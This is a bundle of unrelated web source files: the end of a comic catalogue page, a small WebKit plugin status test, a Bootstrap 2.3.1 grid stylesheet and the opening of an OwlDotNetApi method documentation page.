<div class="navlink"> <a href="index35.html">36</a> </div> <div class="navlink"> <a href="index36.html">37</a> </div> <div class="navlink"> <a href="index37.html">38</a> </div> <div class="navlink"> <a href="index38.html">39</a> </div> <div class="navlink"> <a href="index39.html">40</a> </div> <div class="navlink"> <a href="index40.html">41</a> </div> <div class="navlink"> <a href="index41.html">42</a> </div> <div class="navlink"> <a href="index42.html">43</a> </div> <div class="navlink"> <a href="index43.html">44</a> </div> <div class="navlink"> <a href="index44.html">45</a> </div> <div class="navlink"> <a href="index45.html">46</a> </div> <div class="navlink"> <a href="index46.html">47</a> </div> <div class="navlink"> <a href="index47.html">48</a> </div> <div class="navlink"> <a href="index48.html">49</a> </div> <div class="navlink"> <a href="index49.html">50</a> </div> <div class="navlink"> <a href="index50.html">51</a> </div> <div class="navlink"> <a href="index51.html">52</a> </div> <div class="navlink"> <a href="index52.html">53</a> </div> <div class="navlink"> <a href="index53.html">54</a> </div> <div class="navlink"> <a href="index54.html">55</a> </div> <div class="navlink"> <a href="index55.html">56</a> </div> <div class="navlink"> <a href="index56.html">57</a> </div> <div class="navlink"> <a href="index57.html">58</a> </div> <div class="navlink"> <a href="index58.html">59</a> </div> <div class="navlink"> <a href="index59.html">60</a> </div> <div class="navlink"> <a href="index60.html">61</a> </div> <div class="navlink"> <a href="index61.html">62</a> </div> <div class="navlink"> <a href="index62.html">63</a> </div> <div class="navlink"> <a href="index63.html">64</a> </div> <div class="navlink"> <a href="index64.html">65</a> </div> <div class="navlink"> <a href="index65.html">66</a> </div> <div class="navlink"> <a href="index66.html">67</a> </div> <div class="navlink"> <a href="index67.html">68</a> </div> <div class="navlink"> <a href="index68.html">69</a> </div> <div class="navlink"> <a href="index69.html">70</a> </div> <div class="navlink"> <a href="index70.html">71</a> </div> <div class="navlink"> <a href="index71.html">72</a> </div> <div class="navlink"> <a href="index72.html">73</a> </div> <div class="navlink"> <a href="index73.html">74</a> </div> <div class="navlink"> <a href="index74.html">75</a> </div> <div class="navlink"> <a href="index75.html">76</a> </div> <div class="navlink"> <a href="index76.html">77</a> </div> <div class="navlink"> <a href="index77.html">78</a> </div> <div class="navlink"> <a href="index78.html">79</a> </div> <div class="navlink"> <a href="index79.html">80</a> </div> <div class="navlink"> <a href="index80.html">81</a> </div> <div class="navlink"> <a href="index81.html">82</a> </div> <div class="navlink"> <a href="index82.html">83</a> </div> <div class="navlink"> <a href="index83.html">84</a> </div> <div class="navlink"> <a href="index84.html">85</a> </div> <div class="navlink"> <a href="index85.html">86</a> </div> <div class="navlink"> <a href="index86.html">87</a> </div> <div class="navlink"> <a href="index87.html">88</a> </div> <div class="navlink"> <a href="index88.html">89</a> </div> <div class="navlink"> <a href="index89.html">90</a> </div> <div class="navlink"> <a href="index90.html">91</a> </div> <div class="navlink"> <a href="index91.html">92</a> </div> <div class="navlink"> <a href="index92.html">93</a> </div> <div class="navlink" id="current">94</div> <div class="navlink"> <a href="index94.html">95</a> </div> </div> <div class="navigationline"> <div class="navlink"> <a href="index.html">First</a> </div> <div class="navlink"> <a href="index92.html">Previous</a> </div> <div class="navlink"> <a href="index94.html">Next</a> </div> <div class="navlink"> <a href="index94.html">Last</a> </div> </div> </div> <br/> <table> <tr> <td valign="top"> <a href="details/23739.html" title="X-Men: The Manga&#160;#10" id="thumbimage"> <img src="images/23739t.jpg"/> </a> <br/> <a href="details/23739.html" title="X-Men: The Manga&#160;#10">X-Men: The Manga&#160;#10</a> </td> <td valign="top"> <a href="details/23740.html" title="X-Men: The Manga&#160;#11" id="thumbimage"> <img src="images/23740t.jpg"/> </a> <br/> <a href="details/23740.html" title="X-Men: The Manga&#160;#11">X-Men: The Manga&#160;#11</a> </td> <td valign="top"> <a href="details/23741.html" title="X-Men: The Manga&#160;#12" id="thumbimage"> <img src="images/23741t.jpg"/> </a> <br/> <a href="details/23741.html" title="X-Men: The Manga&#160;#12">X-Men: The Manga&#160;#12</a> </td> <td valign="top"> <a href="details/23742.html" title="X-Men: The Manga&#160;#13" id="thumbimage"> <img src="images/23742t.jpg"/> </a> <br/> <a href="details/23742.html" title="X-Men: The Manga&#160;#13">X-Men: The Manga&#160;#13</a> </td> </tr> <tr> <td valign="top"> <a href="details/23746.html" title="X-Men: The Manga&#160;#14" id="thumbimage"> <img src="images/23746t.jpg"/> </a> <br/> <a href="details/23746.html" title="X-Men: The Manga&#160;#14">X-Men: The Manga&#160;#14</a> </td> <td valign="top"> <a href="details/23747.html" title="X-Men: The Manga&#160;#15" id="thumbimage"> <img src="images/23747t.jpg"/> </a> <br/> <a href="details/23747.html" title="X-Men: The Manga&#160;#15">X-Men: The Manga&#160;#15</a> </td> <td valign="top"> <a href="details/23748.html" title="X-Men: The Manga&#160;#16" id="thumbimage"> <img src="images/23748t.jpg"/> </a> <br/> <a href="details/23748.html" title="X-Men: The Manga&#160;#16">X-Men: The Manga&#160;#16</a> </td> <td valign="top"> <a href="details/23749.html" title="X-Men: The Manga&#160;#17" id="thumbimage"> <img src="images/23749t.jpg"/> </a> <br/> <a href="details/23749.html" title="X-Men: The Manga&#160;#17">X-Men: The Manga&#160;#17</a> </td> </tr> <tr> <td valign="top"> <a href="details/23751.html" title="X-Men: The Manga&#160;#18" id="thumbimage"> <img src="images/23751t.jpg"/> </a> <br/> <a href="details/23751.html" title="X-Men: The Manga&#160;#18">X-Men: The Manga&#160;#18</a> </td> <td valign="top"> <a href="details/23752.html" title="X-Men: The Manga&#160;#19" id="thumbimage"> <img src="images/23752t.jpg"/> </a> <br/> <a href="details/23752.html" title="X-Men: The Manga&#160;#19">X-Men: The Manga&#160;#19</a> </td> <td valign="top"> <a href="details/23753.html" title="X-Men: The Manga&#160;#20" id="thumbimage"> <img src="images/23753t.jpg"/> </a> <br/> <a href="details/23753.html" title="X-Men: The Manga&#160;#20">X-Men: The Manga&#160;#20</a> </td> <td valign="top"> <a href="details/23755.html" title="X-Men: The Manga&#160;#21" id="thumbimage"> <img src="images/23755t.jpg"/> </a> <br/> <a href="details/23755.html" title="X-Men: The Manga&#160;#21">X-Men: The Manga&#160;#21</a> </td> </tr> </table> <br/> <div class="value">9/1/2013 3:51:19 AM</div> </div> </BODY> </html>
external/webkit/LayoutTests/plugins/set-status.html
DmitryADP/diff_qc750
<html> <meta charset="utf-8"> <body> <embed name="plg" type="application/x-webkit-test-netscape"></embed> <p>PASS if status bar says "PASS".</p> <script> if (window.layoutTestController) { layoutTestController.dumpStatusCallbacks(); layoutTestController.dumpAsText(); } plg.setStatus(); // Try sending a null string, which used to cause a crash. plg.setStatus("PАSS"); </script></body></html>
wp-content/themes/meteor/core/css/grid/1200.css
emelinahm/umacure
/*! * Bootstrap v2.3.1 * * Copyright 2012 Twitter, Inc * Licensed under the Apache License v2.0 * http://www.apache.org/licenses/LICENSE-2.0 * * Designed and built with all the love in the world @twitter by @mdo and @fat. */ .clearfix { *zoom: 1; } .clearfix:before, .clearfix:after { display: table; content: ""; line-height: 0; } .clearfix:after { clear: both; } .hide-text { font: 0/0 a; color: transparent; text-shadow: none; background-color: transparent; border: 0; } .input-block-level { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } article, aside, details, figcaption, figure, footer, header, hgroup, nav, section { display: block; } audio, canvas, video { display: inline-block; *display: inline; *zoom: 1; } audio:not([controls]) { display: none; } html { font-size: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } a:focus { outline: thin dotted #333; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } a:hover, a:active { outline: 0; } sub, sup { position: relative; font-size: 75%; line-height: 0; vertical-align: baseline; } sup { top: -0.5em; } sub { bottom: -0.25em; } img { /* Responsive images (ensure images don't scale beyond their parents) */ /* Part 1: Set a maxium relative to the parent */ max-width: 100%; /* IE7-8 need help adjusting responsive images */ width: auto\9; /* Part 2: Scale the height according to the width, otherwise you get stretching */ height: auto; vertical-align: middle; border: 0; -ms-interpolation-mode: bicubic; } #map_canvas img, .google-maps img { max-width: none; } button, input, select, textarea { margin: 0; font-size: 100%; vertical-align: middle; } button, input { *overflow: visible; line-height: normal; } button::-moz-focus-inner, input::-moz-focus-inner { padding: 0; border: 0; } button, html input[type="button"], input[type="reset"], input[type="submit"] { -webkit-appearance: button; cursor: pointer; } label, select, button, input[type="button"], input[type="reset"], input[type="submit"], input[type="radio"], input[type="checkbox"] { cursor: pointer; } input[type="search"] { -webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box; -webkit-appearance: textfield; } input[type="search"]::-webkit-search-decoration, input[type="search"]::-webkit-search-cancel-button { -webkit-appearance: none; } textarea { overflow: auto; vertical-align: top; } @media print { * { text-shadow: none !important; color: #000 !important; background: transparent !important; box-shadow: none !important; } a, a:visited { text-decoration: underline; } a[href]:after { content: " (" attr(href) ")"; } abbr[title]:after { content: " (" attr(title) ")"; } .ir a:after, a[href^="javascript:"]:after, a[href^="#"]:after { content: ""; } pre, blockquote { border: 1px solid #999; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } img { max-width: 100% !important; } @page { margin: 0.5cm; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } } .row { margin-left: -20px; *zoom: 1; } .row:before, .row:after { display: table; content: ""; line-height: 0; } .row:after { clear: both; } [class*="span"] { float: left; min-height: 1px; margin-left: 20px; } .container, .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 940px; } .span12 { width: 940px; } .span11 { width: 860px; } .span10 { width: 780px; } .span9 { width: 700px; } .span8 { width: 620px; } .span7 { width: 540px; } .span6 { width: 460px; } .span5 { width: 380px; } .span4 { width: 300px; } .span3 { width: 220px; } .span2 { width: 140px; } .span1 { width: 60px; } .offset12 { margin-left: 980px; } .offset11 { margin-left: 900px; } .offset10 { margin-left: 820px; } .offset9 { margin-left: 740px; } .offset8 { margin-left: 660px; } .offset7 { margin-left: 580px; } .offset6 { margin-left: 500px; } .offset5 { margin-left: 420px; } .offset4 { margin-left: 340px; } .offset3 { margin-left: 260px; } .offset2 { margin-left: 180px; } .offset1 { margin-left: 100px; } .row-fluid { width: 100%; *zoom: 1; } .row-fluid:before, .row-fluid:after { display: table; content: ""; line-height: 0; } .row-fluid:after { clear: both; } .row-fluid [class*="span"] { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; float: left; margin-left: 2.127659574468085%; *margin-left: 2.074468085106383%; } .row-fluid [class*="span"]:first-child { margin-left: 0; } .row-fluid .controls-row [class*="span"] + [class*="span"] { margin-left: 2.127659574468085%; } .row-fluid .span12 { width: 100%; *width: 99.94680851063829%; } .row-fluid .span11 { width: 91.48936170212765%; *width: 91.43617021276594%; } .row-fluid .span10 { width: 82.97872340425532%; *width: 82.92553191489361%; } .row-fluid .span9 { width: 74.46808510638297%; *width: 74.41489361702126%; } .row-fluid .span8 { width: 65.95744680851064%; *width: 65.90425531914893%; } .row-fluid .span7 { width: 57.44680851063829%; *width: 57.39361702127659%; } .row-fluid .span6 { width: 48.93617021276595%; *width: 48.88297872340425%; } .row-fluid .span5 { width: 40.42553191489362%; *width: 40.37234042553192%; } .row-fluid .span4 { width: 31.914893617021278%; *width: 31.861702127659576%; } .row-fluid .span3 { width: 23.404255319148934%; *width: 23.351063829787233%; } .row-fluid .span2 { width: 14.893617021276595%; *width: 14.840425531914894%; } .row-fluid .span1 { width: 6.382978723404255%; *width: 6.329787234042553%; } .row-fluid .offset12 { margin-left: 104.25531914893617%; *margin-left: 104.14893617021275%; } .row-fluid .offset12:first-child { margin-left: 102.12765957446808%; *margin-left: 102.02127659574467%; } .row-fluid .offset11 { margin-left: 95.74468085106382%; *margin-left: 95.6382978723404%; } .row-fluid .offset11:first-child { margin-left: 93.61702127659574%; *margin-left: 93.51063829787232%; } .row-fluid .offset10 { margin-left: 87.23404255319149%; *margin-left: 87.12765957446807%; } .row-fluid .offset10:first-child { margin-left: 85.1063829787234%; *margin-left: 84.99999999999999%; } .row-fluid .offset9 { margin-left: 78.72340425531914%; *margin-left: 78.61702127659572%; } .row-fluid .offset9:first-child { margin-left: 76.59574468085106%; *margin-left: 76.48936170212764%; } .row-fluid .offset8 { margin-left: 70.2127659574468%; *margin-left: 70.10638297872339%; } .row-fluid .offset8:first-child { margin-left: 68.08510638297872%; *margin-left: 67.9787234042553%; } .row-fluid .offset7 { margin-left: 61.70212765957446%; *margin-left: 61.59574468085106%; } .row-fluid .offset7:first-child { margin-left: 59.574468085106375%; *margin-left: 59.46808510638297%; } .row-fluid .offset6 { margin-left: 53.191489361702125%; *margin-left: 53.085106382978715%; } .row-fluid .offset6:first-child { margin-left: 51.063829787234035%; *margin-left: 50.95744680851063%; } .row-fluid .offset5 { margin-left: 44.68085106382979%; *margin-left: 44.57446808510638%; } .row-fluid .offset5:first-child { margin-left: 42.5531914893617%; *margin-left: 42.4468085106383%; } .row-fluid .offset4 { margin-left: 36.170212765957444%; *margin-left: 36.06382978723405%; } .row-fluid .offset4:first-child { margin-left: 34.04255319148936%; *margin-left: 33.93617021276596%; } .row-fluid .offset3 { margin-left: 27.659574468085104%; *margin-left: 27.5531914893617%; } .row-fluid .offset3:first-child { margin-left: 25.53191489361702%; *margin-left: 25.425531914893618%; } .row-fluid .offset2 { margin-left: 19.148936170212764%; *margin-left: 19.04255319148936%; } .row-fluid .offset2:first-child { margin-left: 17.02127659574468%; *margin-left: 16.914893617021278%; } .row-fluid .offset1 { margin-left: 10.638297872340425%; *margin-left: 10.53191489361702%; } .row-fluid .offset1:first-child { margin-left: 8.51063829787234%; *margin-left: 8.404255319148938%; } [class*="span"].hide, .row-fluid [class*="span"].hide { display: none; } [class*="span"].pull-right, .row-fluid [class*="span"].pull-right { float: right; } .tooltip { position: absolute; z-index: 1030; display: block; visibility: visible; font-size: 11px; line-height: 1.4; opacity: 0; filter: alpha(opacity=0); } .tooltip.in { opacity: 0.8; filter: alpha(opacity=80); } .tooltip.top { margin-top: -3px; padding: 5px 0; } .tooltip.right { margin-left: 3px; padding: 0 5px; } .tooltip.bottom { margin-top: 3px; padding: 5px 0; } .tooltip.left { margin-left: -3px; padding: 0 5px; } .tooltip-inner { max-width: 200px; padding: 8px; color: #ffffff; text-align: center; text-decoration: none; background-color: #000000; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .tooltip.top .tooltip-arrow { bottom: 0; left: 50%; margin-left: -5px; border-width: 5px 5px 0; border-top-color: #000000; } .tooltip.right .tooltip-arrow { top: 50%; left: 0; margin-top: -5px; border-width: 5px 5px 5px 0; border-right-color: #000000; } .tooltip.left .tooltip-arrow { top: 50%; right: 0; margin-top: -5px; border-width: 5px 0 5px 5px; border-left-color: #000000; } .tooltip.bottom .tooltip-arrow { top: 0; left: 50%; margin-left: -5px; border-width: 0 5px 5px; border-bottom-color: #000000; } @-ms-viewport { width: device-width; } .hidden { display: none; visibility: hidden; } .visible-phone { display: none !important; } .visible-tablet { display: none !important; } .hidden-desktop { display: none !important; } .visible-desktop { display: inherit !important; } @media (min-width: 768px) and (max-width: 979px) { .hidden-desktop { display: inherit !important; } .visible-desktop { display: none !important ; } .visible-tablet { display: inherit !important; } .hidden-tablet { display: none !important; } } @media (max-width: 767px) { .hidden-desktop { display: inherit !important; } .visible-desktop { display: none !important; } .visible-phone { display: inherit !important; } .hidden-phone { display: none !important; } } .visible-print { display: none !important; } @media print { .visible-print { display: inherit !important; } .hidden-print { display: none !important; } } @media (max-width: 767px) { body { padding-left: 20px; padding-right: 20px; } .navbar-fixed-top, .navbar-fixed-bottom, .navbar-static-top { margin-left: -20px; margin-right: -20px; } .container-fluid { padding: 0; } .dl-horizontal dt { float: none; clear: none; width: auto; text-align: left; } .dl-horizontal dd { margin-left: 0; } .container { width: auto; } .row-fluid { width: 100%; } .row, .thumbnails { margin-left: 0; } .thumbnails > li { float: none; margin-left: 0; } [class*="span"], .uneditable-input[class*="span"], .row-fluid [class*="span"] { float: none; display: block; width: 100%; margin-left: 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .span12, .row-fluid .span12 { width: 100%; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .row-fluid [class*="offset"]:first-child { margin-left: 0; } .input-large, .input-xlarge, .input-xxlarge, input[class*="span"], select[class*="span"], textarea[class*="span"], .uneditable-input { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .input-prepend input, .input-append input, .input-prepend input[class*="span"], .input-append input[class*="span"] { display: inline-block; width: auto; } .controls-row [class*="span"] + [class*="span"] { margin-left: 0; } .modal { position: fixed; top: 20px; left: 20px; right: 20px; width: auto; margin: 0; } .modal.fade { top: -100px; } .modal.fade.in { top: 20px; } } @media (max-width: 480px) { .nav-collapse { -webkit-transform: translate3d(0, 0, 0); } .page-header h1 small { display: block; line-height: 20px; } input[type="checkbox"], input[type="radio"] { border: 1px solid #ccc; } .form-horizontal .control-label { float: none; width: auto; padding-top: 0; text-align: left; } .form-horizontal .controls { margin-left: 0; } .form-horizontal .control-list { padding-top: 0; } .form-horizontal .form-actions { padding-left: 10px; padding-right: 10px; } .media .pull-left, .media .pull-right { float: none; display: block; margin-bottom: 10px; } .media-object { margin-right: 0; margin-left: 0; } .modal { top: 10px; left: 10px; right: 10px; } .modal-header .close { padding: 10px; margin: -10px; } .carousel-caption { position: static; } } @media (min-width: 768px) and (max-width: 979px) { .row { margin-left: -20px; *zoom: 1; } .row:before, .row:after { display: table; content: ""; line-height: 0; } .row:after { clear: both; } [class*="span"] { float: left; min-height: 1px; margin-left: 20px; } .container, .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 724px; } .span12 { width: 724px; } .span11 { width: 662px; } .span10 { width: 600px; } .span9 { width: 538px; } .span8 { width: 476px; } .span7 { width: 414px; } .span6 { width: 352px; } .span5 { width: 290px; } .span4 { width: 228px; } .span3 { width: 166px; } .span2 { width: 104px; } .span1 { width: 42px; } .offset12 { margin-left: 764px; } .offset11 { margin-left: 702px; } .offset10 { margin-left: 640px; } .offset9 { margin-left: 578px; } .offset8 { margin-left: 516px; } .offset7 { margin-left: 454px; } .offset6 { margin-left: 392px; } .offset5 { margin-left: 330px; } .offset4 { margin-left: 268px; } .offset3 { margin-left: 206px; } .offset2 { margin-left: 144px; } .offset1 { margin-left: 82px; } .row-fluid { width: 100%; *zoom: 1; } .row-fluid:before, .row-fluid:after { display: table; content: ""; line-height: 0; } .row-fluid:after { clear: both; } .row-fluid [class*="span"] { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; float: left; margin-left: 2.7624309392265194%; *margin-left: 2.709239449864817%; } .row-fluid [class*="span"]:first-child { margin-left: 0; } .row-fluid .controls-row [class*="span"] + [class*="span"] { margin-left: 2.7624309392265194%; } .row-fluid .span12 { width: 100%; *width: 99.94680851063829%; } .row-fluid .span11 { width: 91.43646408839778%; *width: 91.38327259903608%; } .row-fluid .span10 { width: 82.87292817679558%; *width: 82.81973668743387%; } .row-fluid .span9 { width: 74.30939226519337%; *width: 74.25620077583166%; } .row-fluid .span8 { width: 65.74585635359117%; *width: 65.69266486422946%; } .row-fluid .span7 { width: 57.18232044198895%; *width: 57.12912895262725%; } .row-fluid .span6 { width: 48.61878453038674%; *width: 48.56559304102504%; } .row-fluid .span5 { width: 40.05524861878453%; *width: 40.00205712942283%; } .row-fluid .span4 { width: 31.491712707182323%; *width: 31.43852121782062%; } .row-fluid .span3 { width: 22.92817679558011%; *width: 22.87498530621841%; } .row-fluid .span2 { width: 14.3646408839779%; *width: 14.311449394616199%; } .row-fluid .span1 { width: 5.801104972375691%; *width: 5.747913483013988%; } .row-fluid .offset12 { margin-left: 105.52486187845304%; *margin-left: 105.41847889972962%; } .row-fluid .offset12:first-child { margin-left: 102.76243093922652%; *margin-left: 102.6560479605031%; } .row-fluid .offset11 { margin-left: 96.96132596685082%; *margin-left: 96.8549429881274%; } .row-fluid .offset11:first-child { margin-left: 94.1988950276243%; *margin-left: 94.09251204890089%; } .row-fluid .offset10 { margin-left: 88.39779005524862%; *margin-left: 88.2914070765252%; } .row-fluid .offset10:first-child { margin-left: 85.6353591160221%; *margin-left: 85.52897613729868%; } .row-fluid .offset9 { margin-left: 79.8342541436464%; *margin-left: 79.72787116492299%; } .row-fluid .offset9:first-child { margin-left: 77.07182320441989%; *margin-left: 76.96544022569647%; } .row-fluid .offset8 { margin-left: 71.2707182320442%; *margin-left: 71.16433525332079%; } .row-fluid .offset8:first-child { margin-left: 68.50828729281768%; *margin-left: 68.40190431409427%; } .row-fluid .offset7 { margin-left: 62.70718232044199%; *margin-left: 62.600799341718584%; } .row-fluid .offset7:first-child { margin-left: 59.94475138121547%; *margin-left: 59.838368402492065%; } .row-fluid .offset6 { margin-left: 54.14364640883978%; *margin-left: 54.037263430116376%; } .row-fluid .offset6:first-child { margin-left: 51.38121546961326%; *margin-left: 51.27483249088986%; } .row-fluid .offset5 { margin-left: 45.58011049723757%; *margin-left: 45.47372751851417%; } .row-fluid .offset5:first-child { margin-left: 42.81767955801105%; *margin-left: 42.71129657928765%; } .row-fluid .offset4 { margin-left: 37.01657458563536%; *margin-left: 36.91019160691196%; } .row-fluid .offset4:first-child { margin-left: 34.25414364640884%; *margin-left: 34.14776066768544%; } .row-fluid .offset3 { margin-left: 28.45303867403315%; *margin-left: 28.346655695309746%; } .row-fluid .offset3:first-child { margin-left: 25.69060773480663%; *margin-left: 25.584224756083227%; } .row-fluid .offset2 { margin-left: 19.88950276243094%; *margin-left: 19.783119783707537%; } .row-fluid .offset2:first-child { margin-left: 17.12707182320442%; *margin-left: 17.02068884448102%; } .row-fluid .offset1 { margin-left: 11.32596685082873%; *margin-left: 11.219583872105325%; } .row-fluid .offset1:first-child { margin-left: 8.56353591160221%; *margin-left: 8.457152932878806%; } input, textarea, .uneditable-input { margin-left: 0; } .controls-row [class*="span"] + [class*="span"] { margin-left: 20px; } input.span12, textarea.span12, .uneditable-input.span12 { width: 710px; } input.span11, textarea.span11, .uneditable-input.span11 { width: 648px; } input.span10, textarea.span10, .uneditable-input.span10 { width: 586px; } input.span9, textarea.span9, .uneditable-input.span9 { width: 524px; } input.span8, textarea.span8, .uneditable-input.span8 { width: 462px; } input.span7, textarea.span7, .uneditable-input.span7 { width: 400px; } input.span6, textarea.span6, .uneditable-input.span6 { width: 338px; } input.span5, textarea.span5, .uneditable-input.span5 { width: 276px; } input.span4, textarea.span4, .uneditable-input.span4 { width: 214px; } input.span3, textarea.span3, .uneditable-input.span3 { width: 152px; } input.span2, textarea.span2, .uneditable-input.span2 { width: 90px; } input.span1, textarea.span1, .uneditable-input.span1 { width: 28px; } } @media (min-width: 1200px) { .row { margin-left: -30px; *zoom: 1; } .row:before, .row:after { display: table; content: ""; line-height: 0; } .row:after { clear: both; } [class*="span"] { float: left; min-height: 1px; margin-left: 30px; } .container, .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 1170px; } .span12 { width: 1170px; } .span11 { width: 1070px; } .span10 { width: 970px; } .span9 { width: 870px; } .span8 { width: 770px; } .span7 { width: 670px; } .span6 { width: 570px; } .span5 { width: 470px; } .span4 { width: 370px; } .span3 { width: 270px; } .span2 { width: 170px; } .span1 { width: 70px; } .offset12 { margin-left: 1230px; } .offset11 { margin-left: 1130px; } .offset10 { margin-left: 1030px; } .offset9 { margin-left: 930px; } .offset8 { margin-left: 830px; } .offset7 { margin-left: 730px; } .offset6 { margin-left: 630px; } .offset5 { margin-left: 530px; } .offset4 { margin-left: 430px; } .offset3 { margin-left: 330px; } .offset2 { margin-left: 230px; } .offset1 { margin-left: 130px; } .row-fluid { width: 100%; *zoom: 1; } .row-fluid:before, .row-fluid:after { display: table; content: ""; line-height: 0; } .row-fluid:after { clear: both; } .row-fluid [class*="span"] { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; float: left; margin-left: 2.564102564102564%; *margin-left: 2.5109110747408616%; } .row-fluid [class*="span"]:first-child { margin-left: 0; } .row-fluid .controls-row [class*="span"] + [class*="span"] { margin-left: 2.564102564102564%; } .row-fluid .span12 { width: 100%; *width: 99.94680851063829%; } .row-fluid .span11 { width: 91.45299145299145%; *width: 91.39979996362975%; } .row-fluid .span10 { width: 82.90598290598291%; *width: 82.8527914166212%; } .row-fluid .span9 { width: 74.35897435897436%; *width: 74.30578286961266%; } .row-fluid .span8 { width: 65.81196581196582%; *width: 65.75877432260411%; } .row-fluid .span7 { width: 57.26495726495726%; *width: 57.21176577559556%; } .row-fluid .span6 { width: 48.717948717948715%; *width: 48.664757228587014%; } .row-fluid .span5 { width: 40.17094017094017%; *width: 40.11774868157847%; } .row-fluid .span4 { width: 31.623931623931625%; *width: 31.570740134569924%; } .row-fluid .span3 { width: 23.076923076923077%; *width: 23.023731587561375%; } .row-fluid .span2 { width: 14.52991452991453%; *width: 14.476723040552828%; } .row-fluid .span1 { width: 5.982905982905983%; *width: 5.929714493544281%; } .row-fluid .offset12 { margin-left: 105.12820512820512%; *margin-left: 105.02182214948171%; } .row-fluid .offset12:first-child { margin-left: 102.56410256410257%; *margin-left: 102.45771958537915%; } .row-fluid .offset11 { margin-left: 96.58119658119658%; *margin-left: 96.47481360247316%; } .row-fluid .offset11:first-child { margin-left: 94.01709401709402%; *margin-left: 93.91071103837061%; } .row-fluid .offset10 { margin-left: 88.03418803418803%; *margin-left: 87.92780505546462%; } .row-fluid .offset10:first-child { margin-left: 85.47008547008548%; *margin-left: 85.36370249136206%; } .row-fluid .offset9 { margin-left: 79.48717948717949%; *margin-left: 79.38079650845607%; } .row-fluid .offset9:first-child { margin-left: 76.92307692307693%; *margin-left: 76.81669394435352%; } .row-fluid .offset8 { margin-left: 70.94017094017094%; *margin-left: 70.83378796144753%; } .row-fluid .offset8:first-child { margin-left: 68.37606837606839%; *margin-left: 68.26968539734497%; } .row-fluid .offset7 { margin-left: 62.393162393162385%; *margin-left: 62.28677941443899%; } .row-fluid .offset7:first-child { margin-left: 59.82905982905982%; *margin-left: 59.72267685033642%; } .row-fluid .offset6 { margin-left: 53.84615384615384%; *margin-left: 53.739770867430444%; } .row-fluid .offset6:first-child { margin-left: 51.28205128205128%; *margin-left: 51.175668303327875%; } .row-fluid .offset5 { margin-left: 45.299145299145295%; *margin-left: 45.1927623204219%; } .row-fluid .offset5:first-child { margin-left: 42.73504273504273%; *margin-left: 42.62865975631933%; } .row-fluid .offset4 { margin-left: 36.75213675213675%; *margin-left: 36.645753773413354%; } .row-fluid .offset4:first-child { margin-left: 34.18803418803419%; *margin-left: 34.081651209310785%; } .row-fluid .offset3 { margin-left: 28.205128205128204%; *margin-left: 28.0987452264048%; } .row-fluid .offset3:first-child { margin-left: 25.641025641025642%; *margin-left: 25.53464266230224%; } .row-fluid .offset2 { margin-left: 19.65811965811966%; *margin-left: 19.551736679396257%; } .row-fluid .offset2:first-child { margin-left: 17.094017094017094%; *margin-left: 16.98763411529369%; } .row-fluid .offset1 { margin-left: 11.11111111111111%; *margin-left: 11.004728132387708%; } .row-fluid .offset1:first-child { margin-left: 8.547008547008547%; *margin-left: 8.440625568285142%; } input, textarea, .uneditable-input { margin-left: 0; } .controls-row [class*="span"] + [class*="span"] { margin-left: 30px; } input.span12, textarea.span12, .uneditable-input.span12 { width: 1156px; } input.span11, textarea.span11, .uneditable-input.span11 { width: 1056px; } input.span10, textarea.span10, .uneditable-input.span10 { width: 956px; } input.span9, textarea.span9, .uneditable-input.span9 { width: 856px; } input.span8, textarea.span8, .uneditable-input.span8 { width: 756px; } input.span7, textarea.span7, .uneditable-input.span7 { width: 656px; } input.span6, textarea.span6, .uneditable-input.span6 { width: 556px; } input.span5, textarea.span5, .uneditable-input.span5 { width: 456px; } input.span4, textarea.span4, .uneditable-input.span4 { width: 356px; } input.span3, textarea.span3, .uneditable-input.span3 { width: 256px; } input.span2, textarea.span2, .uneditable-input.span2 { width: 156px; } input.span1, textarea.span1, .uneditable-input.span1 { width: 56px; } .thumbnails { margin-left: -30px; } .thumbnails > li { margin-left: 30px; } .row-fluid .thumbnails { margin-left: 0; } }
source/OwlDotNetApi/doc/owldotnetapi/OwlDotNetApi.IOwlVisitor.Visit_overload_11.html
bpellens/owldotnetapi
<html dir="LTR"> <head> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1252" /> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5" /> <title>IOwlVisitor.Visit Method (OwlAnnotationProperty, Object)</title> <xml> </xml> <link rel="stylesheet" type="text/css" href="MSDN.css" /> </head> <body id="bodyID" class="dtBODY"> <div id="nsbanner"> <div id="bannerrow1"> <table class="bannerparthead" cellspacing="0"> <tr id="hdr"> <td class="runninghead">OwlDotNetApi Documentation</td> <td class="product"> </td> </tr> </table> </div> <div id="TitleRow"> <h1 class="dtH1">IOwlVisitor.Visit Method (OwlAnnotationProperty, Object)</h1> </div> </div> <div id="nstext"> <p> Visit function to generate some output, used in the visitor pattern </p> <div class="syntax"> <a href="ms-help://MS.NETFrameworkSDKv1.1/cpref/html/frlrfSystemVoidClassTopic.htm">void</a> Visit(<br />   <a href="OwlDotNetApi.OwlAnnotationProperty.html">OwlAnnotationProperty</a> <i>node</i>,<br />   <a href="ms-help://MS.NETFrameworkSDKv1.1/cpref/html/frlrfSystemObjectClassTopic.htm">object</a> <i>parent</i><br />);</div> <h4 class="dtH4">Parameters</h4> <dl> <dt> 